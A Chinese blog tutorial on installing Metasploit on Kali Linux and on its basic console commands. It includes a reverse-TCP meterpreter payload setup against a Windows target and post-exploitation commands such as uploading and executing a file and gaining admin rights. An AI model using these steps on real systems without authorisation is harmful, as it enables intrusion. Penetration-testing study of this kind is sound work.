MSF安装与简单使用

最新推荐文章于 2024-05-08 02:22:07 发布
最新推荐文章于 2024-05-08 02:22:07 发布
阅读量2.9k 收藏 12
点赞数 1
分类专栏: 安全 文章标签: linux debian 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23435961/article/details/124825624
版权

MSF安装与使用

建议直接安装Kali,Kali是以Linux系统进行封装的。Kali系统的优点在于这个系统集合了大量的优秀的安全工具,同时还能对这些工具进行升级。其中也包含了MSF。建议是用虚拟机来运行kali系统

Kali安装可参考链接https://blog.csdn.net/qq_23435961/article/details/124821168?spm=1001.2014.3001.5502

一、远程进入MSF

打开Xshell,连接Kali系统,

Linux kali 5.16.0-kali7-amd64 #1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
┌──(prjz㉿kali)-[~]
└─$ sudo su -
[sudo] prjz 的密码:
┌──(root㉿kali)-[~]
└─# msfconsole 
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.1.39-dev                          ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post       ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View a module's description using 
info, or the enhanced version in your browser with 
info -d

msf6 >

注释:2214 exploits(代表2214个攻击工具) 1171 auxiliary(1171个扩展模块) 396 post(396个扩展脚本攻击)
616 payloads(616个木马) 45 encoders (45个编码器) 11 nops
9 evasion

二、更新MFS及目录结构

1、替换yum源

vim /etc/apt/source.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
#deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

2、添加数字签名

wget archive.kali.org/archive-key.asc   //下载签名
apt-key add archive-key.asc   //安装签名

3、安装MSF框架

┌──(root㉿kali)-[~]
└─# apt-get update //更新
┌──(root㉿kali)-[~]
└─# apt-get  install metasploit-framework  //安装msf框架
┌──(root㉿kali)-[~]
└─# msfconsole 
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.1.42-dev                          ]
+ -- --=[ 2221 exploits - 1171 auxiliary - 397 post       ]
+ -- --=[ 875 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Search can apply complex filters such as 
search cve:2009 type:exploit, see all the filters 
with help search

msf6 >

MSF的目录结构

MSF Kali下存放目录:/usr/share/metasploit-framework/

┌──(root㉿kali)-[~]
└─# ls /usr/share/metasploit-framework/
app     documentation  metasploit-framework.gemspec  msfdb            msfupdate  Rakefile         script-recon
config  Gemfile        modules                       msf-json-rpc.ru  msfvenom   ruby             scripts
data    Gemfile.lock   msfconsole                    msfrpc           msf-ws.ru  script-exploit   tools
db      lib            msfd                          msfrpcd          plugins    script-password  vendor
                                                                                                                                            
┌──(root㉿kali)-[~]
└─#

三、MFS基本命令

执行`?`命令,查看命令
在?后加命令,查看命令用法
search 搜索
use(打开的意思)
看工具如何使用 show options
查看工具的描述和帮助文档 info
back (从hh当前环境返回)
connect(连接一个主机,如下连接百度80端口)
jobs显示和管理作业(和windows任务管理器的进程作用一样)
set:给一个变量赋值,setg:把一个赋值给全局变量,例如上述set设置的IP,就会用到其他攻击模块的RHOST中,unset:解出一个或多个变量,version:显示MSF和控制台库版本

四、MSF木马生成使用

1.天境、nessus、极光扫描器进行漏洞扫描,根据扫描结果去msf里面去查找漏洞利用工具
2.打开msf,通过search搜索漏洞编号或名称
3.用use打开msf漏洞利用工具
4.输入info查看工具使用方法
5.用show options查看工具使用方法
6.配置目标ip:

set rhosts  192.168.1.17

配置反向木马:

set payload windows/meterpreter/reverse_tcp

配置监听者ip:

set lhost 192.168.1.19

7.攻击 exploit/run
出现

meterpreter>

即为攻击成功,进入命令行 shell

五、meterpreter后期攻击使用方法

1.上传文件到window

upload //root//123.exe c:\\123.exe

2.从windows主机下载文件

download <file> <path to save>

3.执行exe.文件

execute -f c://123.exe

4.创建CMD新通道

execute -f cmd -c

img

5.显示进程

img

6.获取admin权限

img

7.获取当前用户getuid

img

正在输入中…………
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MSF使用与靶场安装
Cper的博客
10-22 1841
MSF的一些实操练习
metasploit-termux:一个简单的metasploit安装工具,用于termux
03-14
通常,你可以在该项目的根目录下找到README文件,它会提供安装使用Metasploit-termux的详细步骤。 使用Metasploit-termux的步骤大致如下: 1. 安装Termux:首先,你需要在你的Android设备上下载并安装Termux应用...
kali中安装使用msfconsole
wyzhxhn的博客
10-25 7953
msfconsole安装
kali_msf6_渗透
摸鱼域的空气。
01-27 9540
奶奶曾说过,证明自己学懂的方式就是教会别人。 工具简介: msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。 通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为k.
网络安全: Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux(5)
最新发布
2401_83621004的博客
05-08 784
ip addr。
kali-安全渗透学习-01
君临天下的博客
05-21 158
2.2.1 windows可执行程序后门(不能绕过杀毒软件)2.1.3、设置必选项(Required:yes为必填)当某台主机点击前期生成的木马程序时。2.2.2、执行木马监控。可以查看可以执行的操作。2.1.1、查找模块。2.1.2、使用模块。2.1.4、设置模块。2.1.6、攻击成功。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4259
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
Kali Linux利用MSF渗透Windows11电脑
Xiao5ovo的博客
03-02 5319
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
msf-autoshell:向该工具提供一个.nessus文件,它将自动为您提供MSF Shell
05-02
我已经包括了早期的和不完整的程序,以使想要学习如何使用python-libnessus和msfrpc库的人们更加容易。 msf-autoshell-boilerplate.py是第一步; 一个简单的样板程序,其中填充了一些无聊的内容。 msf-autoshell-...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
柠檬:简单MSFVenom有效负载生成器
02-14
柠檬 一个简单MSFVenom有效载荷生成器 安装 git clone https://github.com/spicesouls/lemon cd lemon bash setup.sh python3 lemon.py
metasploit开发使用详细解析.docx
03-22
在 Windows 系统上安装 Metasploit 相当简单。首先,访问官方网站 http://www.metasploit.com/ 下载适用于 Windows 的安装包。安装过程中应注意: 1. 安装前关闭所有杀毒软件,以避免误报或干扰安装过程。 2. 选择...
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 2万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
Metosploit官方说明
qq_43776408的博客
08-31 377
Core Commands ============= Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the...
网络安全:kali之MSF工具基本使用方法
Mr_qing的博客
10-08 5077
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
在Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3151
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
windows下安装kali子系统
BING
04-24 3410
3、 找到你想转到wsl子系统下的文件。例如我想将桌面的123.txt文件转到子系统下。控制面板—》程序—》启用或关闭windows功能—》适用于linux的windows子系统—》确定。目录位置,可以用everything搜索LocalState\rootfs即可,找到自己路径。4、 选择复制或者移动你的文件到指定目录下,可以使用cp也可以使用mv,这里使用的是mv。1、cd /mnt转到 /mnt 目录下,你可以看到自己的盘信息。windows设置—》更新和安全—》开发者选项—》开发人员模式。
【初学kali】--切换root用户、安装msf
weixin_55205599的博客
03-20 2783
1、首次切换root时,设置信密码,输入命令:sudo passwd root。3、打开msf控制台:root用户,命令:msfconsole。输入新设置的密码即可,变为以下即说明成功切换到root用户。显示successfully,说明新密码设置成功。2、切换root用户,命令:su - root。
Kali更新 以及 安装MSF命令 和其他更新升级相关的命令
hanzhen668的博客
09-04 4848
/etc/apt/sources.list vim打开文件 在文档中加入以下更新源 #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolli...
termux安装Msf
04-06
Termux是一款在Android设备上运行的开源终端模拟器,它提供了一个类似于Linux终端的环境,可以在Android设备上进行命令行操作。而Msf(Metasploit Framework)是一款广泛使用的渗透测试工具,它提供了丰富的漏洞利用模块和攻击载荷,用于测试和评估系统的安全性。 要在Termux上安装Msf,可以按照以下步骤进行操作: 1. 首先,在Google Play商店中下载并安装Termux应用。 2. 打开Termux应用后,会自动安装一些基本的软件包。等待安装完成后,可以通过运行`apt update`和`apt upgrade`命令来更新软件包。 3. 接下来,需要安装一些必要的软件包和依赖项。运行以下命令来安装这些软件包: ``` apt install wget curl git ``` 4. 安装完必要的软件包后,可以开始下载并安装Msf。运行以下命令来下载Msf安装脚本: ``` curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ``` 5. 下载完成后,运行以下命令来给安装脚本添加执行权限: ``` chmod +x metasploit.sh ``` 6. 最后,运行以下命令来执行安装脚本并安装Msf: ``` ./metasploit.sh ``` 安装过程可能需要一些时间,请耐心等待。 7. 安装完成后,可以通过运行`msfconsole`命令来启动Metasploit Framework。 请注意,Msf是一款强大的渗透测试工具,使用时需要遵守法律和道德规范,仅用于合法的安全测试和评估目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

正在输入中…………

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值